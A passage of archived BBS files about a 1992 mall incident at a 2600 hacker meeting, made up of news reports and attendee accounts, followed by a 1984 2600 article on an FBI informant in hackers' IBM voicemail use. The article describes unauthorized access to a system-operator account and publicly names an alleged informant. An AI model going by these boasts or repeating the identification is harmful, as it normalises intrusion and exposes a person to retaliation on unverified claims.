Secret Service." They also maintain that the mall police confiscated 
material from knapsacks and took film from someone attempting to 
photograph the action and a list of the names of security officers 
that one attendee was attempting to compile.
 
Al Johnson, chief of security for the mall, denied these allegations 
to Newsbytes, saying, "No one said that we were acting on behalf of 
the Secret Service. We were merely enforcing our regulations. While 
the group was not disruptive, it had pulled tables together and was 
having a meeting in our food court area. The food court is for 
people eating and is not for meetings. We therefore asked the 
people to leave."
 
Johnson denied that security personnel took away any film or lists 
and further said: "We did not confiscate any material. The group
refused to own up to who owned material on the tables and in the
vicinity so we collected it as lost material. If it turns out
that anything did belong to any of those people, they are welcome
to come in and, after making proper identification, take the
material."
 
In a conversation early on November 9th, Robert Rasor, Secret Service
agent-in-charge of computer crime investigations, told Newsbytes that
having mall security forces represent the Secret Service is not 
something that was done and, that to his knowledge, the Secret 
Service had no involvement with any Pentagon City mall actions 
on the previous Friday.
 
A Newsbytes call to the Arlington County police was returned by a
Detective Nuneville who said that her instructions were to refer all
questions concerning the matter to agent David Adams of the Secret
Service. She told Newsbytes that Adams would be providing all
information concerning the involvement of both the Arlington Police and
the Secret Service in the incident.
 
Adams told Newsbytes: "The mall police were not acting as agents
for the Secret Service. Beyond that, I can not confirm or deny
that there is an ongoing investigation."
 
Adams also told Newsbytes that: "While I cannot speak for the
Arlington police, I understand that their involvement was due to
an incident unrelated to the investigation."
 
Marc Rotenberg, director of the Washington office of Computer
Professionals for Social Responsibility (CPSR), told Newsbytes
that "CPSR has reason to believe that the detention of people at
the Pentagon City Mall last Friday was undertaken at the behest
of the Secret Service, which is a federal agency."
 
"If that is the case, then there was an illegal search of people
at the mall. There was no warrant and no indication of probable
illegal activity. This raises constitutional issues. We have
undertaken the filing of a Freedom of Information Act (FOIA)
request to determine the scope, involvement and purpose of the
Secret Service in this action," he said.
 
2600 meetings are held on the evening of the first Friday of each 
month in public places and malls in New York City, Washington, 
Philadelphia, Cambridge, St. Louis, Chicago, Los Angeles and San 
Francisco. They are promoted by "2600 Magazine: The Hacker Quarterly"
and are attended by a variety of persons interested in 
telecommunications and so-called "hacker issues." 
 
The New York meeting, the oldest of its kind, is regularly attended
by Eric Corley a/k/a Emmanuel Goldstein, editor and publisher of 2600,
hackers, journalists, corporate communications professionals and other
interested parties. It is known to have been the subject of 
surveillance at various times by law enforcement agencies conducting 
investigations into allegations of computer crime.
 
Corley told Newsbytes: "While I'm sure that meetings have been
observed by law enforcement agencies, this is the only time that
we have been harassed. It's definitely a freedom of speech
issue." Corley also that he plans to be at the December meeting
in Washington "to insure that it doesn't happen again."
 
(Barbara E. McMullen & John F. McMullen/19921110)
Subject: ****Conflicting Stories in 2600 Raid 11/11/92
From: newsbytes@clarinet.com
Date: 11 Nov 92 20:52:29 GMT
 
WASHINGTON, D.C., U.S.A., 1992 NOV 11 (NB) -- In the on-going 
investigation of possible Secret Service involvement in the Friday, 
November 6th ejection of attendees at a "2600 meeting" from the premises 
of the Pentagon City Mall, opposing statements have come from the 
same source.
 
Al Johnson, chief of security for the Pentagon City Mall, told 
Newsbytes on Monday, November 9th: "No one said that we were acting 
on behalf of the Secret Service. We were merely enforcing our 
regulations. While the group was not disruptive, it had pulled 
tables together and was having a meeting in our food court area. 
The food court is for people eating and is not for meetings. We 
therefore asked the people to leave."
 
On the same day, Johnson was quoted was quoted in a Communications 
Daily article by Brock Meeks as saying, "As far as I'm concerned, 
we're out of this. The Secret Service, the FBI, they're the ones 
that ramrodded this whole thing."
 
Newsbytes contacted Meeks to discuss the discrepancies in the stories and 
was informed that the conversation with Johnson had been taped and was 
available for review. This Newsbytes reporter listened to the tape (and 
reviewed a transcript). On the tape, Johnson was clearly heard to make the 
statement quoted by Meeks.
 
He also said, "maybe you ought to call the Secret Service. They're 
handling this whole thing. We, we were just here," and, in response 
to a Meeks question about a Secret Service contact, "Ah.. you know, 
I don't have a contact person. These people were working on their 
own, undercover, we never got any names, but they definitely, we saw 
identification, they were here."
 
Newsbytes contacted Johnson again on the morning of Wednesday, 
November 11 and asked him once again whether there was any Secret 
Service involvement in the action. Johnson said: "No, I told you that 
they were not involved." When it was mentioned that there was a 
story in Communications Daily, quoting him to the contrary, Johnson 
said, "I never told Meeks that. There was no Secret Service 
involvement."
 
Informed of the possible existence of a tape quoting him to the contrary,
Johnson said, "Meeks taped me? He can't do that. I'll show him that 
I'm not fooling around. I'll have him arrested."
 
Johnson also said, "He asked me if the Secret Service was involved; I just 
told him that, if he thought they were, he should call them and ask them."
 
Then Johnson again told Newsbytes that the incident was "just a mall 
problem. There were too many people congregating."
 
In a related matter, Marc Rotenberg, director of the Washington office of 
Computer Professionals For Social Responsibility (CPSR), has announced 
that CPSR has filed a Freedom of Information Act (FOIA) request with the 
Secret Service asking for information concerning Secret Service 
involvement in the incident.
 
Rotenberg told Newsbytes that the Secret Service has 10 days to respond 
to the request. He also said that CPSR "is exploring other legal 
options in this matter."
 
The Secret Service, in earlier conversations with Newsbytes, has denied 
that the mall security was working on its behalf.
 
In the actual incident, a group attending the informal meeting was 
disbanded and, according to attendees, had property confiscated. 
They also contend that security guards took film from someone 
photographing the confiscation as well as a list that someone was 
making of the guard's names. 
 
In his November 9th conversation with Newsbytes, Johnson denied that 
security personnel took away any film or lists and further said, "We 
did not confiscate any material. The group refused to own up to 
who owned material on the tables and in the vicinity so we collected 
it as lost material. If it turns out that anything did belong to any 
of those people, they are welcome to come in and, after making proper 
identification, take the material."
 
2600 meetings are promoted by "2600 Magazine: The Hacker Quarterly" and 
are held on the evening of the first Friday of each month in public 
places and malls in New York City, Washington, Philadelphia, Cambridge, 
St. Louis, Chicago, Los Angeles and San Francisco. They are regularly 
attended by a variety of persons interested in telecommunications and 
so-called "hacker issues."
 
(Barbara E. McMullen & John F. McMullen/19921111)
Hackers Allege Harassment at Mall; Pentagon City Guards Stop
Meeting, Tell Computer Group to Leave

By Robert O'Harrow Jr.
=Washington Post Staff Writer= There were about 20 of them,
computer hackers mostly in their late teens and early twenties.
They met in the Food Court at the Pentagon City shopping mall,
where they pushed a few tables together, munched on junk food and
began to discuss their hobby: infiltrating private computer net-
works.
 
Suddenly, in a scene that resembled something from a spy novel,
they were surrounded by a few mall security guards and at least
one agent from the Secret Service. The guards demanded identifi-
cation and wrote down the computer hackers' names, authorities
said later.
 
Several bags containing computer books and printouts were confis-
cated, and the group was booted out of the mall. Arlington pol-
ice, who described the incident as a Secret Service matter, were
on the scene but arrested no one.
 
The incident Friday offered a glimpse into a cat-and-mouse game
being played out in malls and train stations and on computer net-
works across the nation by hackers and federal agents who track
them as part of an effort to crack down on computer and telephone
fraud.
 
It's a game in which computer hackers, many of whom take pride in
their ability to snoop through private records, now are complain-
ing that their privacy rights are being violated by law enforce-
ment officers who track them.
 
The Secret Service, which Congress has directed to go after com-
puter hackers who use phone lines to break into computer systems
for free long-distance phone service or other information, ack-
nowledges that its agents often track groups of young hackers who
gather to discuss their passion.
 
Special Agent David Adams, an agency spokesman, would neither
confirm nor deny agency involvement in the Pentagon City in-
cident, which involved a group called the 2600 Meeting, named
after a New York-based magazine for hackers.
 
"We don't make any comments on ongoing investigations," said
Adams, who said the agency believes that hackers across the coun-
try are responsible for computer and telephone fraud costing more
than $1 billion annually.
 
"We're not targeting any group," said Adams, who said that in ad-
dition to following suspected hackers, the agency searches for
them by working computer networks.
 
In general, he said, "We're targeting people who have committed
violations under the (federal) statute."
 
The current issue of 2600 magazine contains articles on such to-
pics as creating computer viruses, using long-distance phone
lines without paying for them and other high-technology tricks.
 
The term "hackers" is used to describe a variety of computer
users, from whizzes who test their skills by scanning private
networks, to those who illegally use computer networks and phone
lines for profit.
 
Most fall somewhere in between. They use sophisticated software
to search telephone systems for on-line computers, collect data
as proof of their exploits and consider hacking a game.
 
Hackers can be costly to governments and businesses, running up
phone bills and altering confidential information.  During the
Persian Gulf War, a group of Dutch teenagers broke into the
Pentagon's computers and modified or copied information about
U.S. war operations.
 
Like members of similarly named groups in New York, San Francisco
and several other cities, the Washington group meets on the first
Friday of each month. Each group's meetings take place in public,
and at least some members apparently are accustomed to scrutiny
by federal agents. A recent advertisement in 2600 promoting a
meeting in New York encouraged members to "come by, drop off ar-
ticles, ask questions, find the undercover agents." Michael Min-
nich, a 17-year-old Arlington resident who organized the local
group, said its members "explore things in technological society
that have not been explored very well."
 
News about Friday's incident quickly spread on electronic bul-
letin boards across the country, and computer users from New York
to California's Silicon Valley have flooded on-line forums with
complaints that the hackers were harassed without being charged
with any crime.
 
Even computer professionals who normally look down on hackers'
illicit techniques have weighed in, raising questions about con-
stitutional rights.
 
"Their concern is, the government is singling out a group and
trampling on their civil liberties," said John McMullen, a
university computer teacher and New York correspondent for News-
bytes, a computer news service.  According to several members of
the hackers' group, Friday's incident began about 6 p.m., shortly
after group members had pushed tables together in the mall's Food
Court.
 
With some members of the group still arriving, mall guards sur-
rounded the group and began asking for identification. Group
member Craig Neidorf, 23, said the guards demanded to know why
one member had a computer keyboard. Neidorf said the guards
seemed to know they were holding a meeting.
 
"They knew what they were doing," he said. "I think it was
harassment."
 
Nathan Newton, 24, another member, said the guards searched
through some of the group's belongings and took several bags con-
taining computer books, magazines and printouts.
 
A third group member, who asked not to be identified, said that
an Arlington police officer asked for his student ID, even though
the group member objected.
 
The officer "said they were working with the Secret Service, and
therefore they had the right to do what they were doing," said
the student, who lives in Arlington.
 
Al Johnson, chief of the mall's security force, said the guards
did not detain anyone and confiscated only some bags that were
left on the tables. Johnson said they moved in on the group be-
cause one group member was carrying handcuffs and because meet-
ings are not allowed in the privately owned mall.
 
"We're not here to make arrests. We're here to keep people mov-
ing," Johnson said.
 
"As far as I'm concerned this whole thing is over."
                            RAID ON 2600 MEETING
                              NOVEMBER 7, 1992


There was a raid on a 2600 Meeting in Washington D.C. on November 7th. 
People were detained without reason, private property was illegally 
searched and seized, and a group of about 20 U.S. citizens were harrassed 
by security forces. What follows is several accounts of what happened as 
described by a few of the people who were there.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This is my personal statement as to exactly what happened during the DC
2600 raid on Friday, November 7th 1992. Granted I cannot remember the exact
dialogue that was exchanged, I will get the general meaning of everything
said and done, by both parties.

The Mad Hatter

__________

I arrived at the 2600 meeting, with Loki, at approximately 4:30pm. We
headed towards the food court after looking throughout a few electronics
stores in interest to grab a bite to eat. After eating, we proceeded to the
fourth floor, to scope out on everything before the meeting actually
started. On the way up to the fourth floor, we ran into Tomellicas. We
consulted for a few minutes, and then all went up to the fourth floor. We
continued to hang out on the fourth floor, and then we saw Albatross back
down on the first floor, so we hollared on got his attention, then
proceeded back up to the fourth floor. Shortly after, Psionic Nemesis
arrived on the scene. We continued to hang out, then proceeded back to the
first floor.

After arrivng down on the first floor, we moved tables together, rearranged
the seeting layout, then proceeded with the meeting. Knight Lightning
arrived a little before 6:00 and handed out some literature, along with a
kooky little button. People slowly arrived, and the meeting was underway.

At this point, the fed scene started to pick up drastically. Tomellicas was
snapping pictures of every single fed (or what appared to be) there. After
chatting for awhile longer, Techno Caster, Hack Rat, and a few others
arrived (maybe not in that order). Hack Rat came over to my table, or part
of the table, where I slapped my handcuffs that I had brought on him. At
this time, Techno Caster had showed his Whisper 2000 to Metal Head.

Immediately there after, several members of the Mall Security task force
<chuckle> surrounded the area, demanding to see the 'stun gun'. Naturally
denying everything about a stun gun, the hostility grew. Finally one of the
guards saw what they thought was the stun gun, and pointed at the Whisper
2000, which was in the hands of (I think) Metal Head. Metal Head told the
officers "This? This is *the* Whisper 2000!", the guard examined it,
questioned what we had it for, and basically just pestered us some more.
One of the guards (who seemed to be the leader at this point) came over
across the table from me, and was looking at the stuff on the center of the
table, in front of Loki and myself.

Then, over his walky-talky, I heard them say something about handcuffs.
Without hesitating, the guard said "Who has the handcuffs?", I then said "I
do." At this point the guard was examining my handcuffs, and questioned me
as to why I had them. Basically telling him just because I felt like it,
did nothing but agrivate him, and the situation. He then asked me to
produce identification. I asked as to why and the discussion went on for
about sixty seconds, when I just decided to give him my ID because I was
just plain sick of this ignorant discussion. He copied everything down from
it, and asked me what my name was. I simply asked him if he was having
trouble reading it, and he sneered at me.

At this point, the rest of the guards started taking identification from
others. The guard who had took my ID had asked Loki, sitting right across
one side of the table from me, to see the contents of his backpack. Loki
declined, and the guard asked again. The guard switched topics, and asked
Loki to produce identification. Loki then handed him about 4 different
forms of ID, the only thing he was missing was a birth certificate. The
guard asked to see the contents of his bag, and once again Loki declined.
The argument went back and forth for another minute or two, when Loki
boldly exclaimed "You cannot search my bag, but I will show you what is in
it." Loki proceeded to show him everything in the bag at this point. After
pulling a few things that looked very suspicious to the guard out of his
bag (read: after pulling a few soldered connections, a bundle of phone
cable, and a couple of electronic devices out of his bag...).

At this time, I turned to my left to see a rather large guy wearing a nice
suit who appeared to be taking over the command of the rent-a-cops. I
immediately asked him his name, or two see some form of identification
after he was doing the same to other people at the meeting. He flat out
said "No.". So I just sighed at the entire ignorance of the man. Tomellicas
quickly snapped a few pictures of him, and other guards there who wouldn't
identify themselves. The guard literally took the film out of Tomellicas's
camera at this point.

Hack Rat had proceeded to make a list of the guards names who were
involved. After the guards noticed this, they took the list Hack Rat had
compiled, and ripped it up, keeping the shreds.

At this point, on the other side of my table, I watched Loki zipping his
bag back up after having a few things taken out of it. The big guy in the
suit came and studied the stuff that had been taken out of his bag and
asked Loki what he was doing with it. After exchanging words for about 2
minutes, the big guy proceeded to research Loki's bag. Noted that Loki gave
no permission for the guy to search it, he just plain started going through
it.

At this point I wanted my handcuffs back, and I was out of there. I
couldn't handle this sort of police harassment and basic bullshit. I told
the guard I wanted my handcuffs back, and he refused. I asked for a
receipt, and he refused. I said "I'm leaving, I have better things to do
than to be harassed by a buncha rent-a-cops." <granted under my breath, but
he still hearrd me> he proceeded to say "Sit back down.". At this point I
just figured I might as well do whatever they wanted so I could just go
home and see the Bulls game.

This irrelevant search continued to go on for roughly a little less than
two hours. None of the guards would give us any reason for why we were
being detained, or why we were being searched. After sitting there for
roughly two hours, we were all starting to get a little (lot) uptight about
the whole situation and starting demanding we know why we were being held
there and searched.

One of the guards said that he thought we had a stun gun and that's why we
were being searched. I made it really clear to him that (a) stun guns are
not illegal in the state of virginia, and (b) afteer we showed him what he
(they) saw, and he saw that it was hardly a stun gun, but an amplified
sound device for deaf people, that he had no right to search us any
further, let alone everyone there. Denying that these laws were infact
true, he told me to shut up. Laughing at his idiocy, I just sat there,
preparing for hari-kari.

Finally, after about another thirty minutes of bullshit, we were told to
leave the mall immediately. Not understanding why, myself and others
questioned him as to why we were being detained, searched, and kicked out.
He gave no reason, except to say that this was private property, and that
if we did not leave, we would be arrested, by the one Arlington County cop
now on the scene. Just wanting to go see the Bulls game, I proceeded to
leave, with Hack Rat, Tomellicas, and someone else who I forgot was at this
time. We left the scene, and proceeded to Crystal City Underground, where
we met up with Techno Caster and a couple others discussing the torment we
had all just experienced.

Let alone the embarassment of all the people watching us over the balcony.

----------

Saturday, November 7th, 1992. Hack Rat and I thought it would be wise to
contact the Pentagon Mall Security office on three-way. I called
information, obtained the number (703/415-3410). I called the number and a
lady picked up on the other end. I told her that I would like to speak with
whoever was in charge, or present at the raid in the food court last night.
She told me that nobody was there, they were either sick, or not working
today. I told her "Out of the roughly 8 people there last night, they are
all sick? That's bullshit. I want to speak with someone who was there last
night, or I want all of the officers names, and the name of the person in
charge." She told me I'd have to call back in 30 mintues. I wait.

Thirty minutes later, Hack Rat and I call back. The same lady answers and I
ask to speak to someone present, or the man in charge of the food court
raid last night. She said please hold. I was transfered somewhere. A man
picked up the phone, this voice was very familiar, and I could easily match
it with the guy who took my handcuffs from me, the one who told me to shut
up. I asked him what his name was, and the names of everyone there, and of
whoever was in charge. He said that he was not allowed to give that
information out. After dealing with the idiocy for another 5 minutes,
tension grew along with the hostility.

After a little more social engineering, I was able to bs a name out of him.
Al Johnson, who was supposivedly the head of security.

After this, I called up Loki. We called Fenris Wolf on three way. Fenris
told us that one of his parental units called the mall security office to
find that Loki's bag had been 'turned over to federal authorities'.

Loki, never given a receipt for his bag, even after asking, was extremely
pissed at this point.


The Mad Hatter

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

dead cow #16 @1 [imic]
Sun Nov 08 15:21:42 1992
here's my story, as i witnessed it.

i was coming down the escallator when i noticed that there were a bunch of
people standing around and all these cops in the center. so i rushed up to
the center and asked the cops what was going on. the cop said "i have
nothing to say to you" so i asked who i could talk to. he said that nobody
had anything to say, that no one would talk to me. then i was questioned
about my relation to this group. i denied any relation. i was then asked to
leave, at which point i moved over to a group of 2600 people standing at a
distance observing. i attempted to ask them what was going on, but at that
point the mall cop wearing a bike outfit (what was with that guy?) asked us
to leave. i walked most of the way to the door then stopped to remove my
camera from my bag, meanwhile asking if i could stay long enough to use the
bathroom. they told me that i had to use the metro bathroom. i said that i
didn't think there was one. they said yes, ask the attendant. i then got my
camera out and asked if i could take a picture. the guard said, in a
threatening voice, that if i took his pic he would take my film. i put the
camera in my pocket.i had a couple of old motherboards in my hands, they
asked me what they were, i said they were old motherboards, they asked each
other if (some guy who's name i didn't catch) would be interested in these.
i said they could have them if they wanted, they were worth about $2. they
said, no, they werent gonna take them, just leave. i stalled a few more
times, and then they said that if i stalled one mor time i would be
arrested. i left the mall at that pt.

we then went up the metro escallator, and stood around in a group at the
top of the escallator. the mall cops were there, in the mall driveway, in
their car. at some point, a group of mall cops came out and were very
belligerant with someone. i stood back at a distance and took a picture,
then turned away and started walking. the cops yelled after me, i gave my
camera to another person. they wanted my film, i said i didn't have the
camera. gentry jumped in and started arguing with the man, telling him that
it was legal to take the picture. the man became very angy with gentry, and
then started yelling about how he was here not to warn us about leaving the
area, but to tell us to move our cars (all our cars were parked someplace
else) from the curb, where there were SOME cars, because the arlington cops
were coming. we said that we didn't have any cars, and he ignored that and
proceded to warn us again. then he turned and gestured at gentry with his
hand. at the same point gentry brought his hand up to scratch his head, and
the hands met. the mall cop became very angry and told gentry that if he
touched the mall cop again he would do some thing (i forget the threat)
then we started talking about the camera, and the mall cop denied that he
had ever wanted the film. after that, the mall cop left. then we left.

that's what happened...

dc

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Inhuman

November 8th, 1992

What follows is my account of the events as I observed them at Pentagon
City Fashion Center Mall on the evening of Friday, November 6th.

I arrived at the mall around 6:45 p.m., almost two hours after the meeting
began. I recognized a group of people on the food court to be part of the
meeting and started heading towards them. At this point, I noticed that
there were several mall security personnel and perhaps other law
enforcement officials (I'm not sure) spread throughout the meeting area.
Most were just standing there, some were talking to the meeting-goers.

Since nothing too dangerous seemed to be happening, I walked into the
middle of the meeting area, looking at all the guards. I asked one of the
meeting-goers what was going on and he said "We're being detained." I then
asked one of the guards (a young caucasion blonde male in a blue spandex
biking outfit) what was going on. He replied, "You'll find out from your
friends afterwards. Why don't you go wait with your friends over there.",
indicating the group of people I entered the mall with.

I left the food court. Some of the guards looked slightly upset that I was
leaving, but made no move to stop me. I waited out-of-view of the food
court for about five minutes and then returned. At this point,
meeting-goers were just beginning to leave the food court area in the
direction of the mall exit, apparently having been released from their
detention. Guards remained on the outskirts of the group, directing them
towards the exit.

I asked one of the guards (a middle-aged heavy-set african-american male)
if we had to leave, and he said yes. When I protested, he threatened to
arrest me for trespassing since "this is private property." When I asked
what his name was, he pointed to his name tag. The name tag had nothing
more than a legal signature on it, which was quite unreadable. When asked
him what his name was again, explaining that I couldn't read his name tag,
he said, "You can't read my name tag? Too bad." Then I noticed he had
another name tag with "C. Thomas" clearly printed on it.

At this point, Dead Cow, who was nearby, asked if he could take the guard's
picture. The guard said that if he did, he would take the film out of the
camera. When then left the mall, along with the rest of the group.

We waited in the Metrorail (D.C. public transportation) access tunnel
directly outside of the mall for a while, gathering information from each
other and deciding on a course of action.

We went upstairs and outside, to a small bank of payphones near the Metro
entrance and near the mall's outside entrance. One of the meeting-goers,
Lithium Bandit, called the Washington Post and recounted the story, hoping
to get a reporter to the scene. They said they would call back if they were
interested. Several suggestions were made to call News Channel 8, a cable
24-hours-a-day local news channel, but the call was never made. About
twenty of us remained at this point, there having been around fourty total.

About ten minutes later, the mall security guards reappeared. I was on the
phone with Emmanuel Goldstien at the time, so I didn't see the initial
interactions, and I'm still not clear what they were trying to tell us to
do this time, as we were no longer on private property. At some point, Dead
Cow took his camera out and took a couple pictures of the scene. At this,
the guards, especially C. Thomas, became incensed. Thomas demanded the
film, somehow claiming that Dead Cow was not allowed to take a picture of
him. The film remained in our possesion. Then Gentry, another meeting-goer,
began to get in an argument with C. Thomas over Dead Cow's right to take
his picture, and the general rights violations that had occured already. At
some point, Gentry apparently touched C. Thomas in an inadvertant manner.
Thomas then yelled very loudly, "Don't TOUCH me!" and made some threat
about what he would do if Gentry touched him again.

People began to leave now, to regroup at the Crystal City Underground,
including me, so thus ends my account.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

While walking to the escalator I noticed that in the food court (where all
my friends were) there was a large number of uniformed security type
people. Thinking this rather odd I went down the escalator and just walked
past the whole group. While walking by I noticed that the security people
were in the process of taking magazines and other written materials away
from my friends, also one large security man was taking people's
Identification and writing down their id information. Since from apperance
th e group being questioned (and in my mind harrassed) had done nothing
wrong (but still were being questioned and harrassed) I decided it best to
save myself the harrassement and just go over to Roy Rogers and order a
Medium Coke.

While in line I saw a girl I knew from the computer meet and said "What is
going on?" Her reply was I don't know, but I'll send Nat (my friend) over
here to talk to you. Nat and I talked then I proceeded to join the Group. I
sat down near Nat and started talking with him. Then I saw another friend
and I went over to talk to him. I said "Hey man how is it going?" at which
point a large security person Questioned me "Are you with them?"

Me: What? I just came over here to talk to him (pointing to my buddy)

Security Man: Are you with these people? If you are take a seat and wait.
If not get out of here!

Me: I just want to talk with my friend, but am not with any group of
people.

Security: Leave now!

Me: I am not with anyone I just want to talk to my friend.

Security: Go away! Right now! (this man spoke in a very intimidating and
rude tone)

The whole thime of this conversation he had taken my friend's drivers
license and was writing down information about my friend. Seeing that if I
stayed over here that I would get harrassed I went back over to the other
end where of the meeting, where Nat was. Then I sat down and drank some of
my coke. After about three minutes a security man with Latin American looks
said "Open your bag and show me what you have in there." At this point I
had taken more guff and seen more than enough Unreasonable Search and
Seizure than I cared so I left. So I left, he said real loud "Don't leave
stay here!" He provided me no reason and showed no authority as a police
officer, so I continued to leave. And left.

IVTOB


X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

 Another file downloaded from:                               NIRVANAnet(tm)

 & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
 The Salted Slug                          Strange              408-454-9368
 Burn This Flag                           Zardoz               408-363-9766
 realitycheck                             Poindexter Fortran   510-527-1662
 Lies Unlimited                           Mick Freen           415-583-4102
 Tomorrow's 0rder of Magnitude            Finger_Man           415-961-9315
 My Dog Bit Jesus                         Suzanne D'Fault      510-658-8078
 New Dork Sublime                         Demented Pimiento    415-566-0126

   Specializing in conversations, obscure information, high explosives,
        arcane knowledge, political extremism, diverse sexuality,
       insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.

  Full access for first-time callers.  We don't want to know who you are,
   where you live, or what your phone number is. We are not Big Brother.

                          "Raw Data for Raw Nerves"

X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

Downloaded From P-80 International Information Systems 304-744-2253
File: THE FBI GOES AFTER ADS HACKERS
 Read 17 times

			  FBI GOES AFTER ADS HACKERS
			     [2600 - January 1984]

-------------------------------------------------------------------------------
IBM must press charges before action can be taken -- Feds reveal their tactics,
				  blow source
-------------------------------------------------------------------------------

   We received this bombshell from an anonymous contributor.  It seems that a
group of hackers was making use of one of IBM's ADS systems.  (Audio
Distribution Systems enable users with touch-tone phones to send voice messages
back and forth to each other...)  Unforturately, as is all too often the case,
one of these hackers was really an FBI informant who was taking note of all of
the illegitimate users (around 40 or so).  Luckily for this particular group,
the informant was sloppy and left many telltale clues which gave them literally
months of warning.  So, when the informant decided to send a message to the
system operator, advising IBM to take action against the hackers and to call
the FBI for more information, the hackers were ready.  The system operator's
account had also been penetrated by them and hence, the message was received by
the hacker's first!  One of them actually followed the instructions in the
message and called the FBI!  And for some reason, the investigator there
thought he was talking to an IBM executive.  This is some of what he said.

				     *****

   One of the individuals that supplies me with information from time to time
has uncovered a lot of abuse within the ADS systems, not only here in the
United States, but in England and Italy.  I talk to this individual on a
private bulletin board...

   We have no ability to come in as an outside investigative or law enforcement
agency and do anything about it because, first off, we don't have a
complainant.  We don't want to step on anybody's toes, but it's been our policy
to monitor bulletin boards and phone phreaking activity across the country and
advise commercial computer systems and corporations if we do discover certain
computers along with the passwords and account numbers being published on the
board.	We do this on a one on one basis.

			  The GTE Telemail Connection

   That was my baby, too!  As a matter of fact, that's how we came across the
ADS system -- through the GTE investigation.  [These] people are not just
interested in data communications through terminals -- they will leave voice
messages on an ADS.  We have been slowly uncovering more and more on the ADS in
the last two months.

   The major phase of [the Telemail investigation] was about 20 individuals
that we had located and identified and we're looking for indictments on most of
them coming down in the next month or two.  We're talking about a group of
highly organized people that do communicate on a daily basis all the way across
the country -- from San Francisco and L.A. to Denver to upstate New York.  So
we have a core of individuals that we are still looking at that are using your
system and then we have this peripheral that we are not as concerned about
because they are not part of an out & out conpiracy or an organized network,
per se.  I know of at least 8 or 10 that are the central figures in this, the
carryover from Telemail.  And we keep hearing information of other people who
are calling in with junk messages--there's no real substance to their messages.
Now the reason I know that is that they have included on of my sources of
information onto their system and so he gets messages from the other parties.

			   The Communist Connection

   In a way we're somewhat fortunate that it's 16-year-olds or 26-year-olds as
opposed to people from behind the Iron Curtain.  It gives us the opportunity to
see how these systems work and see if we can plug any loopholes before somebody
from a not-friendly nation would try the same thing.  I personally fully expect
it -- I'm surprised it hasn't happened in the past.  It may have.  We just
haven't caught it.  But the kids are a little bit sloppier and they're getting
caught...I hate to sound paranoid, but we're supposed to be concerned with the
big picture as far as is there anything sensitive in nature.  For us within the
bureau, sensitive in nature first off means national security and you've got
corporate trade secrets and the like that you don't want being distributed.

		     How the FBI Wins Trust and Gets Info

   The subjects have an ego problem and they love to talk to other individuals
about what they are capable of doing and braggin about it.  They have a
tendency to trade information.	Everything is negotiable with them.  We have
never had to barter away access to systems -- we do it more on the technical
information of phone networks, computer systems, and the like to where it's
more of a technical information tradeoof as opposed to an access tradeoff.  [An
example would be the] logon procedure for a PDP-11.  You integrate yourself
within their confidence and their circle of friends.  You feed them a little
bit of bait and a lot of times they'll go for it.  You enter into a dialogue
with them and they end up taking you for a ride.

   These people are very hungry for technical avenues through which they can
communicate.  It used to be the personal computer bulletin boards -- public
messages that anybody can read.  You start finding out that they leave a phone
number or address -- and you start finding out who the parties are.  There's
thousands of these bulletin boards across the country and you narrow in on
maybe twenty or so that are the more hardcore bulletin boards that are being
used for exchange of illicit information.  Then they move from there to an
electronic mail service, namely GTE Telemail.  They caused fits within Telemail
when they decided to get a little bit cocky and see if they could shut down
accounts and change passwords of administrators and things like that.  From
there they have moved one step further to where they are now the same
individuals communicating through the ADS systems and they also set up
conference calls through the Bell System, so they're not just attacking one
particular system or one individual avenue of communciatons -- they try to hit
them all.  It's an ego trip for all of them.

				 Pen Registers

   We would put a pen register on the phone line of the individual (suspect)
and it would record only the digits dialed on his telephone -- we would not use
a full blown wiretap to record his voice.  We can only put a pen register on an
individual's phone for like, thirty days before we have to go back to a judge
an try to get an extension and we try to minimize the use of our electronic
surveillance equipment so the public does not think we're the Big Brother of
1984.  (laughter)  It's coming.  Actually, we're already there!  (hearty
laughter)

   We have not utilized any pen registers for the specific purposes of going
aftr abusers of the ADS systems.  First off, we have to have an actual case
presented to us or a complaint.  It's a roundabout way of doing it, but it's
the way that we, in the bureau, have to have somebody outside com to us.
Otherwise we can carry on the whole investigation without IBM even being aware
that we are monitoring activity on thier system and we don't want to become
that secret police, or anything like that.  We want to be above board and work
with the corporations in the community.

		  Just How Much Trouble Are These Hackers In?

   On the federal level we can prosecute them for telephone fraud (fraud by
wire) if we can determine that the ADS in an ongoing busines operation and that
you are being denied your just revenues by them sneaking onto your system and
abusing your system.  The strictest penalty is a $1000 fine and 5 years in jail
for an actual conviction of fraud by wire violation.  Those are always lax -- a
more common sentence for an adult maybe a year in jail, 18 months, or a fine,
sometimes they get probation, or agree to pay back an fraudulent money obtained
or for service rendered or whatever to the client company -- it stays on his
record for a year, he's on probation for a year and at the end of that, his
record is wiped clean.	Rarely do they get the maximum penalty.  It just
doesn't happen.

				 Do Me a Favor

   Please do not disclose any geographical location because we are kind of
unique in that we do not have any other source available in any other part
of the coutry that could supply us with information like this.	He may be one
of 200 people, but if you identify Michigan you identify between 2 or 3
indiviudals and it may burn the source.

				     *****

   We'd like to make it clear that we don't intend to do this kind of thing
very often, since rumours about certain people being informatns are very common
in this business.  But this is no rumour.  This, friends, is solid fact -- we
would not have printed this story if we were'nt able to substantiate the claims
it makes, and we had no trouble at all doing that.  Our intent is making this
information known was not to screw up the FBI's fun (they're really not doing
all that much out of the ordinary anyway), but rather to expose a very
dangerous individual who goes by the name of Cable Pair (some say his real name
is John Maxfield).  This person has been posing as an extremely friendly hacker
who lives in Detroit and is just bubbling over with technical information in
exchange for your secrets.  He claims to have been one of the nation's first
phreaks, which may or may not be true.	He gives out his telephone numbers
freely, will do anything to communicate with somebody (like place conference
